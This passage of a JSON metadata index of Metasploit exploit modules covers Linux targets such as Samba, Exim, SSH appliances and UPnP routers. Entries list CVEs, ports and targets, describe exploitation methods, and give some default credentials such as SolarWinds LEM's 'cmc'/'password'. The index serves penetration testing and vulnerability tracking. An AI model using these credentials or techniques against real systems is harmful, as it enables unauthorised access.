"path": "/modules/exploits/linux/postgres/postgres_payload.rb",
"is_install_path": true,
"ref_name": "linux/postgres/postgres_payload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/pptp/poptop_negative_read": {
"name": "Poptop Negative Read Overflow",
"full_name": "exploit/linux/pptp/poptop_negative_read",
"rank": 500,
"disclosure_date": "2003-04-09",
"type": "exploit",
"author": [
"spoonm <spoonm@no$email.com>"
],
"description": "This is an exploit for the Poptop negative read overflow. This will\n work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I\n currently do not have a good way to detect Poptop versions.\n\n The server will by default only allow 4 concurrent manager processes\n (what we run our code in), so you could have a max of 4 shells at once.\n\n Using the current method of exploitation, our socket will be closed\n before we have the ability to run code, preventing the use of Findsock.",
"references": [
"CVE-2003-0213",
"OSVDB-3293",
"URL-http://securityfocus.com/archive/1/317995",
"URL-http://www.freewebs.com/blightninjas/"
],
"platform": "Linux",
"arch": "x86",
"rport": 1723,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux Bruteforce"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/pptp/poptop_negative_read.rb",
"is_install_path": true,
"ref_name": "linux/pptp/poptop_negative_read",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/proxy/squid_ntlm_authenticate": {
"name": "Squid NTLM Authenticate Overflow",
"full_name": "exploit/linux/proxy/squid_ntlm_authenticate",
"rank": 500,
"disclosure_date": "2004-06-08",
"type": "exploit",
"author": [
"skape <mmiller@hick.org>"
],
"description": "This is an exploit for Squid's NTLM authenticate overflow\n (libntlmssp.c). Due to improper bounds checking in\n ntlm_check_auth, it is possible to overflow the 'pass'\n variable on the stack with user controlled data of a user\n defined length. Props to iDEFENSE for the advisory.",
"references": [
"CVE-2004-0541",
"OSVDB-6791",
"URL-http://www.idefense.com/application/poi/display?id=107",
"BID-10500"
],
"platform": "Linux",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Linux Bruteforce"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb",
"is_install_path": true,
"ref_name": "linux/proxy/squid_ntlm_authenticate",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/samba/chain_reply": {
"name": "Samba chain_reply Memory Corruption (Linux x86)",
"full_name": "exploit/linux/samba/chain_reply",
"rank": 400,
"disclosure_date": "2010-06-16",
"type": "exploit",
"author": [
"Jun Mao",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits a memory corruption vulnerability present in Samba versions\n prior to 3.3.13. When handling chained response packets, Samba fails to validate\n the offset value used when building the next part. By setting this value to a\n number larger than the destination buffer size, an attacker can corrupt memory.\n Additionally, setting this value to a value smaller than 'smb_wct' (0x24) will\n cause the header of the input buffer chunk to be corrupted.\n\n After close inspection, it appears that 3.0.x versions of Samba are not\n exploitable. Since they use an \"InputBuffer\" size of 0x20441, an attacker cannot\n cause memory to be corrupted in an exploitable way. It is possible to corrupt the\n heap header of the \"InputBuffer\", but it didn't seem possible to get the chunk\n to be processed again prior to process exit.\n\n In order to gain code execution, this exploit attempts to overwrite a \"talloc\n chunk\" destructor function pointer.\n\n This particular module is capable of exploiting the flaw on x86 Linux systems\n that do not have the nx memory protection.\n\n NOTE: It is possible to make exploitation attempts indefinitely since Samba forks\n for user sessions in the default configuration.",
"references": [
"CVE-2010-2063",
"OSVDB-65518",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=873"
],
"platform": "Linux",
"arch": "",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Linux (Debian5 3.2.5-4lenny6)",
"Debugging Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/samba/chain_reply.rb",
"is_install_path": true,
"ref_name": "linux/samba/chain_reply",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/samba/is_known_pipename": {
"name": "Samba is_known_pipename() Arbitrary Module Load",
"full_name": "exploit/linux/samba/is_known_pipename",
"rank": 600,
"disclosure_date": "2017-03-24",
"type": "exploit",
"author": [
"steelo <knownsteelo@gmail.com>",
"hdm <x@hdm.io>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module triggers an arbitrary shared library load vulnerability\n in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module\n requires valid credentials, a writeable folder in an accessible share,\n and knowledge of the server-side path of the writeable folder. In\n some cases, anonymous access combined with common filesystem locations\n can be used to automatically exploit this vulnerability.",
"references": [
"CVE-2017-7494",
"URL-https://www.samba.org/samba/security/CVE-2017-7494.html"
],
"platform": "Linux",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Automatic (Interact)",
"Automatic (Command)",
"Linux x86",
"Linux x86_64",
"Linux ARM (LE)",
"Linux ARM64",
"Linux MIPS",
"Linux MIPSLE",
"Linux MIPS64",
"Linux MIPS64LE",
"Linux PPC",
"Linux PPC64",
"Linux PPC64 (LE)",
"Linux SPARC",
"Linux SPARC64",
"Linux s390x"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/linux/samba/is_known_pipename.rb",
"is_install_path": true,
"ref_name": "linux/samba/is_known_pipename",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/samba/lsa_transnames_heap": {
"name": "Samba lsa_io_trans_names Heap Overflow",
"full_name": "exploit/linux/samba/lsa_transnames_heap",
"rank": 400,
"disclosure_date": "2007-05-14",
"type": "exploit",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>",
"Adriano Lima <adriano@risesecurity.org>",
"hdm <x@hdm.io>"
],
"description": "This module triggers a heap overflow in the LSA RPC service\n of the Samba daemon. This module uses the TALLOC chunk overwrite\n method (credit Ramon and Adriano), which only works with Samba\n versions 3.0.21-3.0.24. Additionally, this module will not work\n when the Samba \"log level\" parameter is higher than \"2\".",
"references": [
"CVE-2007-2446",
"OSVDB-34699"
],
"platform": "Linux",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Linux vsyscall",
"Linux Heap Brute Force (Debian/Ubuntu)",
"Linux Heap Brute Force (Gentoo)",
"Linux Heap Brute Force (Mandriva)",
"Linux Heap Brute Force (RHEL/CentOS)",
"Linux Heap Brute Force (SUSE)",
"Linux Heap Brute Force (Slackware)",
"Linux Heap Brute Force (OpenWRT MIPS)",
"DEBUG"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/samba/lsa_transnames_heap.rb",
"is_install_path": true,
"ref_name": "linux/samba/lsa_transnames_heap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/samba/setinfopolicy_heap": {
"name": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow",
"full_name": "exploit/linux/samba/setinfopolicy_heap",
"rank": 300,
"disclosure_date": "2012-04-10",
"type": "exploit",
"author": [
"Unknown",
"blasty",
"mephos",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module triggers a vulnerability in the LSA RPC service of the Samba daemon\n because of an error in the PIDL auto-generated code. Making a specially crafted\n call to SetInformationPolicy to set a PolicyAuditEventsInformation makes it possible to\n trigger a heap overflow and finally execute arbitrary code with root privileges.\n\n The module uses brute force to guess the stackpivot/rop chain or the system()\n address and redirect flow there in order to bypass NX. The start and stop addresses\n for brute forcing have been calculated empirically. On the other hand, the module\n provides StartBrute and StopBrute, which allow the user to configure their own\n addresses.",
"references": [
"CVE-2012-1182",
"OSVDB-81303",
"BID-52973",
"ZDI-12-069"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10",
"2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.10",
"2:3.5.8~dfsg-1ubuntu2 on Ubuntu Server 11.04",
"2:3.5.4~dfsg-1ubuntu8 on Ubuntu Server 10.10",
"2:3.5.6~dfsg-3squeeze6 on Debian Squeeze",
"3.5.10-0.107.el5 on CentOS 5"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/samba/setinfopolicy_heap.rb",
"is_install_path": true,
"ref_name": "linux/samba/setinfopolicy_heap",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/samba/trans2open": {
"name": "Samba trans2open Overflow (Linux x86)",
"full_name": "exploit/linux/samba/trans2open",
"rank": 500,
"disclosure_date": "2003-04-07",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"jduck <jduck@metasploit.com>"
],
"description": "This exploits the buffer overflow found in Samba versions\n 2.2.0 to 2.2.8. This particular module is capable of\n exploiting the flaw on x86 Linux systems that do not\n have the noexec stack option set.\n\n NOTE: Some older versions of RedHat do not seem to be vulnerable\n since they apparently do not allow anonymous access to IPC.",
"references": [
"CVE-2003-0201",
"OSVDB-4469",
"BID-7294",
"URL-https://seclists.org/bugtraq/2003/Apr/103"
],
"platform": "Linux",
"arch": "",
"rport": 139,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": [
"Samba 2.2.x - Bruteforce"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/linux/samba/trans2open.rb",
"is_install_path": true,
"ref_name": "linux/samba/trans2open",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/smtp/exim4_dovecot_exec": {
"name": "Exim and Dovecot Insecure Configuration Command Injection",
"full_name": "exploit/linux/smtp/exim4_dovecot_exec",
"rank": 600,
"disclosure_date": "2013-05-03",
"type": "exploit",
"author": [
"Unknown",
"eKKiM",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a command injection vulnerability against Dovecot with\n Exim using the \"use_shell\" option. It uses the sender's address to inject arbitrary\n commands, since this is one of the user-controlled variables. It has been\n successfully tested on Debian Squeeze using the default Exim4 with the dovecot-common\n packages.",
"references": [
"OSVDB-93004",
"EDB-25297",
"URL-https://www.redteam-pentesting.de/advisories/rt-sa-2013-001"
],
"platform": "Linux",
"arch": "x86",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Linux x86"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/linux/smtp/exim4_dovecot_exec.rb",
"is_install_path": true,
"ref_name": "linux/smtp/exim4_dovecot_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/smtp/exim_gethostbyname_bof": {
"name": "Exim GHOST (glibc gethostbyname) Buffer Overflow",
"full_name": "exploit/linux/smtp/exim_gethostbyname_bof",
"rank": 500,
"disclosure_date": "2015-01-27",
"type": "exploit",
"author": [
"Unknown"
],
"description": "This module remotely exploits CVE-2015-0235, aka GHOST, a heap-based\n buffer overflow in the GNU C Library's gethostbyname functions on x86\n and x86_64 GNU/Linux systems that run the Exim mail server.",
"references": [
"CVE-2015-0235",
"US-CERT-VU-967332",
"OSVDB-117579",
"BID-72325",
"URL-https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt",
"URL-https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability",
"URL-http://r-7.co/1CAnMc0"
],
"platform": "Unix",
"arch": "cmd",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/smtp/exim_gethostbyname_bof.rb",
"is_install_path": true,
"ref_name": "linux/smtp/exim_gethostbyname_bof",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/smtp/haraka": {
"name": "Haraka SMTP Command Injection",
"full_name": "exploit/linux/smtp/haraka",
"rank": 600,
"disclosure_date": "2017-01-26",
"type": "exploit",
"author": [
"xychix <xychix[AT]hotmail.com>",
"smfreegard",
"Adam Cammack <adam_cammack[AT]rapid7.com>"
],
"description": "The Haraka SMTP server comes with a plugin for processing attachments.\n Versions before 2.8.9 can be vulnerable to command injection.",
"references": [
"CVE-2016-1000282",
"EDB-41162",
"URL-https://github.com/haraka/Haraka/pull/1606"
],
"platform": "Linux",
"arch": "x64, x86",
"rport": 25,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"linux x64",
"linux x86"
],
"mod_time": "2018-12-14 22:27:11 +0000",
"path": "/modules/exploits/linux/smtp/haraka.py",
"is_install_path": true,
"ref_name": "linux/smtp/haraka",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"Harakiri"
]
}
},
"exploit_linux/ssh/ceragon_fibeair_known_privkey": {
"name": "Ceragon FibeAir IP-10 SSH Private Key Exposure",
"full_name": "exploit/linux/ssh/ceragon_fibeair_known_privkey",
"rank": 600,
"disclosure_date": "2015-04-01",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"todb <todb@metasploit.com>"
],
"description": "Ceragon ships a public/private key pair on FibeAir IP-10 devices\n that allows passwordless authentication to any other IP-10 device.\n Since the key is easily retrievable, an attacker can use it to\n gain unauthorized remote access as the \"mateidu\" user.",
"references": [
"CVE-2015-0936",
"URL-https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/ceragon_fibeair_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/exagrid_known_privkey": {
"name": "ExaGrid Known SSH Key and Default Password",
"full_name": "exploit/linux/ssh/exagrid_known_privkey",
"rank": 600,
"disclosure_date": "2016-04-07",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "ExaGrid ships a public/private key pair on their backup appliances to\n allow passwordless authentication to other ExaGrid appliances. Since\n the private key is easily retrievable, an attacker can use it to gain\n unauthorized remote access as root. Additionally, this module will\n attempt to use the default password for root, 'inflection'.",
"references": [
"CVE-2016-1560",
"CVE-2016-1561",
"URL-https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/linux/ssh/exagrid_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/exagrid_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/f5_bigip_known_privkey": {
"name": "F5 BIG-IP SSH Private Key Exposure",
"full_name": "exploit/linux/ssh/f5_bigip_known_privkey",
"rank": 600,
"disclosure_date": "2012-06-11",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "F5 ships a public/private key pair on BIG-IP appliances that allows\n passwordless authentication to any other BIG-IP box. Since the key is\n easily retrievable, an attacker can use it to gain unauthorized remote\n access as root.",
"references": [
"URL-https://www.trustmatta.com/advisories/MATTA-2012-002.txt",
"CVE-2012-1493",
"OSVDB-82780",
"URL-https://community.rapid7.com/community/metasploit/blog/2012/06/25/press-f5-for-root-shell"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/f5_bigip_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/loadbalancerorg_enterprise_known_privkey": {
"name": "Loadbalancer.org Enterprise VA SSH Private Key Exposure",
"full_name": "exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey",
"rank": 600,
"disclosure_date": "2014-03-17",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Loadbalancer.org ships a public/private key pair on Enterprise virtual appliances\n version 7.5.2 that allows passwordless authentication to any other LB Enterprise box.\n Since the key is easily retrievable, an attacker can use it to gain unauthorized remote\n access as root.",
"references": [
"PACKETSTORM-125754"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-08-15 14:54:41 +0000",
"path": "/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/loadbalancerorg_enterprise_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/mercurial_ssh_exec": {
"name": "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
"full_name": "exploit/linux/ssh/mercurial_ssh_exec",
"rank": 600,
"disclosure_date": "2017-04-18",
"type": "exploit",
"author": [
"claudijd"
],
"description": "This module takes advantage of custom hg-ssh wrapper implementations that don't\n adequately validate parameters passed to the hg binary, allowing users to trigger a\n Python Debugger session, which allows arbitrary Python code execution.",
"references": [
"CVE-2017-9462",
"URL-https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29"
],
"platform": "Python",
"arch": "python",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-24 18:08:15 +0000",
"path": "/modules/exploits/linux/ssh/mercurial_ssh_exec.rb",
"is_install_path": true,
"ref_name": "linux/ssh/mercurial_ssh_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/ssh/quantum_dxi_known_privkey": {
"name": "Quantum DXi V1000 SSH Private Key Exposure",
"full_name": "exploit/linux/ssh/quantum_dxi_known_privkey",
"rank": 600,
"disclosure_date": "2014-03-17",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "Quantum ships a public/private key pair on DXi V1000 2.2.1 appliances that\n allows passwordless authentication to any other DXi box. Since the key is\n easily retrievable, an attacker can use it to gain unauthorized remote\n access as root.",
"references": [
"PACKETSTORM-125755"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/quantum_dxi_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/quantum_vmpro_backdoor": {
"name": "Quantum vmPRO Backdoor Command",
"full_name": "exploit/linux/ssh/quantum_vmpro_backdoor",
"rank": 600,
"disclosure_date": "2014-03-17",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module abuses a backdoor command in Quantum vmPRO. Any user, even one without admin\n privileges, can get access to the restricted SSH shell. By using the hidden backdoor\n \"shell-escape\" command it's possible to drop to a real root bash shell. This module\n has been tested successfully on Quantum vmPRO 3.1.2.",
"references": [
"PACKETSTORM-125760"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Quantum vmPRO 3.1.2"
],
"mod_time": "2018-12-12 15:41:35 +0000",
"path": "/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb",
"is_install_path": true,
"ref_name": "linux/ssh/quantum_vmpro_backdoor",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/ssh/solarwinds_lem_exec": {
"name": "SolarWind LEM Default SSH Password Remote Code Execution",
"full_name": "exploit/linux/ssh/solarwinds_lem_exec",
"rank": 600,
"disclosure_date": "2017-03-17",
"type": "exploit",
"author": [
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits the default credentials of SolarWinds LEM. A menu system is encountered when the SSH\n service is accessed with the default username and password, which are \"cmc\" and \"password\". By exploiting a\n vulnerability that exists in the menuing script, an attacker can escape from the restricted shell.\n\n This module was tested against SolarWinds LEM v6.3.1.",
"references": [
"CVE-2017-7722",
"URL-http://pentest.blog/unexpected-journey-4-escaping-from-restricted-shell-and-gaining-root-access-to-solarwinds-log-event-manager-siem-product/"
],
"platform": "Python",
"arch": "python",
"rport": 32022,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2018-08-15 21:27:40 +0000",
"path": "/modules/exploits/linux/ssh/solarwinds_lem_exec.rb",
"is_install_path": true,
"ref_name": "linux/ssh/solarwinds_lem_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_linux/ssh/symantec_smg_ssh": {
"name": "Symantec Messaging Gateway 9.5 Default SSH Password Vulnerability",
"full_name": "exploit/linux/ssh/symantec_smg_ssh",
"rank": 600,
"disclosure_date": "2012-08-27",
"type": "exploit",
"author": [
"Stefan Viehbock",
"Ben Williams",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a default misconfiguration flaw on Symantec Messaging Gateway.\n The 'support' user has a known default password, which can be used to login to the\n SSH service, and gain privileged access from remote.",
"references": [
"CVE-2012-3579",
"OSVDB-85028",
"BID-55143",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&suid=20120827_00"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Symantec Messaging Gateway 9.5"
],
"mod_time": "2018-12-12 15:41:35 +0000",
"path": "/modules/exploits/linux/ssh/symantec_smg_ssh.rb",
"is_install_path": true,
"ref_name": "linux/ssh/symantec_smg_ssh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/ubiquiti_airos_file_upload": {
"name": "Ubiquiti airOS Arbitrary File Upload",
"full_name": "exploit/linux/ssh/ubiquiti_airos_file_upload",
"rank": 600,
"disclosure_date": "2016-02-13",
"type": "exploit",
"author": [
"93c08539",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a pre-auth file upload to install a new root user\n to /etc/passwd and an SSH key to /etc/dropbear/authorized_keys.\n\n FYI, /etc/{passwd,dropbear/authorized_keys} will be overwritten.\n /etc/persistent/rc.poststart will be overwritten if PERSIST_ETC is true.\n\n This method is used by the \"mf\" malware infecting these devices.",
"references": [
"EDB-39701",
"URL-https://hackerone.com/reports/73480"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Ubiquiti airOS < 5.6.2"
],
"mod_time": "2018-11-16 12:18:28 +0000",
"path": "/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb",
"is_install_path": true,
"ref_name": "linux/ssh/ubiquiti_airos_file_upload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/ssh/vmware_vdp_known_privkey": {
"name": "VMware VDP Known SSH Key",
"full_name": "exploit/linux/ssh/vmware_vdp_known_privkey",
"rank": 600,
"disclosure_date": "2016-12-20",
"type": "exploit",
"author": [
"phroxvs"
],
"description": "VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known SSH private key for the local user 'admin', who is a sudoer without a password.",
"references": [
"CVE-2016-7456",
"URL-https://www.vmware.com/security/advisories/VMSA-2016-0024.html"
],
"platform": "Unix",
"arch": "cmd",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Universal"
],
"mod_time": "2018-12-12 15:41:35 +0000",
"path": "/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb",
"is_install_path": true,
"ref_name": "linux/ssh/vmware_vdp_known_privkey",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/telnet/netgear_telnetenable": {
"name": "NETGEAR TelnetEnable",
"full_name": "exploit/linux/telnet/netgear_telnetenable",
"rank": 600,
"disclosure_date": "2009-10-30",
"type": "exploit",
"author": [
"Paul Gebheim",
"insanid",
"wvu <wvu@metasploit.com>"
],
"description": "This module sends a magic packet to a NETGEAR device to enable telnetd.\n Upon successful connect, a root shell should be presented to the user.",
"references": [
"URL-https://wiki.openwrt.org/toh/netgear/telnet.console",
"URL-https://github.com/cyanitol/netgear-telenetenable",
"URL-https://github.com/insanid/netgear-telenetenable"
],
"platform": "Unix",
"arch": "cmd",
"rport": 23,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic (detect TCP or UDP)",
"TCP (typically older devices)",
"UDP (typically newer devices)"
],
"mod_time": "2019-03-05 21:02:39 +0000",
"path": "/modules/exploits/linux/telnet/netgear_telnetenable.rb",
"is_install_path": true,
"ref_name": "linux/telnet/netgear_telnetenable",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_linux/telnet/telnet_encrypt_keyid": {
"name": "Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",
"full_name": "exploit/linux/telnet/telnet_encrypt_keyid",
"rank": 500,
"disclosure_date": "2011-12-23",
"type": "exploit",
"author": [
"Jaime Penalba Estebanez <jpenalbae@gmail.com>",
"Brandon Perry <bperry.volatile@gmail.com>",
"Dan Rosenberg",
"hdm <x@hdm.io>"
],
"description": "This module exploits a buffer overflow in the encryption option handler of the\n Linux BSD-derived telnet service (inetutils or krb5-telnet). Most Linux distributions\n use NetKit-derived telnet daemons, so this flaw only applies to a small subset of\n Linux systems running telnetd.",
"references": [
"CVE-2011-4862",
"OSVDB-78020",
"BID-51182",
"EDB-18280"
],
"platform": "Linux",
"arch": "",
"rport": 23,
"autofilter_ports": [
23
],
"autofilter_services": [
"telnet"
],
"targets": [
"Automatic",
"Red Hat Enterprise Linux 3 (krb5-telnet)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb",
"is_install_path": true,
"ref_name": "linux/telnet/telnet_encrypt_keyid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/upnp/belkin_wemo_upnp_exec": {
"name": "Belkin Wemo UPnP Remote Code Execution",
"full_name": "exploit/linux/upnp/belkin_wemo_upnp_exec",
"rank": 600,
"disclosure_date": "2014-04-04",
"type": "exploit",
"author": [
"phikshun",
"wvu <wvu@metasploit.com>",
"nstarke"
],
"description": "This module exploits a command injection in the Belkin Wemo UPnP API via\n the SmartDevURL argument to the SetSmartDevInfo action.\n\n This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo\n devices are known to be affected, albeit on a different RPORT (49153).",
"references": [
"URL-https://web.archive.org/web/20150901094849/http://disconnected.io/2014/04/04/universal-plug-and-fuzz/",
"URL-https://github.com/phikshun/ufuzz",
"URL-https://gist.github.com/phikshun/10900566",
"URL-https://gist.github.com/phikshun/9984624",
"URL-https://www.crock-pot.com/wemo-landing-page.html",
"URL-https://www.belkin.com/us/support-article?articleNum=101177",
"URL-http://www.wemo.com/"
],
"platform": "Linux,Unix",
"arch": "cmd, mipsle",
"rport": 49152,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix In-Memory",
"Linux Dropper"
],
"mod_time": "2019-04-24 11:39:34 +0000",
"path": "/modules/exploits/linux/upnp/belkin_wemo_upnp_exec.rb",
"is_install_path": true,
"ref_name": "linux/upnp/belkin_wemo_upnp_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"NOCVE": "Patched in 2.00.8643 without vendor disclosure",
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_linux/upnp/dlink_upnp_msearch_exec": {
"name": "D-Link Unauthenticated UPnP M-SEARCH Multicast Command Injection",
"full_name": "exploit/linux/upnp/dlink_upnp_msearch_exec",
"rank": 600,
"disclosure_date": "2013-02-01",
"type": "exploit",
"author": [
"Zachary Cutlip",
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "Several D-Link routers are vulnerable to OS command injection via UPnP multicast\n requests. This module has been tested on DIR-300 and DIR-645 devices. Zachary Cutlip\n initially reported the DIR-815 as vulnerable. Other devices are probably also\n affected.",
"references": [
"URL-https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection",
"URL-http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html"
],
"platform": "",
"arch": "",
"rport": 1900,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"MIPS Little Endian",
"MIPS Big Endian"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb",
"is_install_path": true,
"ref_name": "linux/upnp/dlink_upnp_msearch_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_linux/upnp/miniupnpd_soap_bof": {
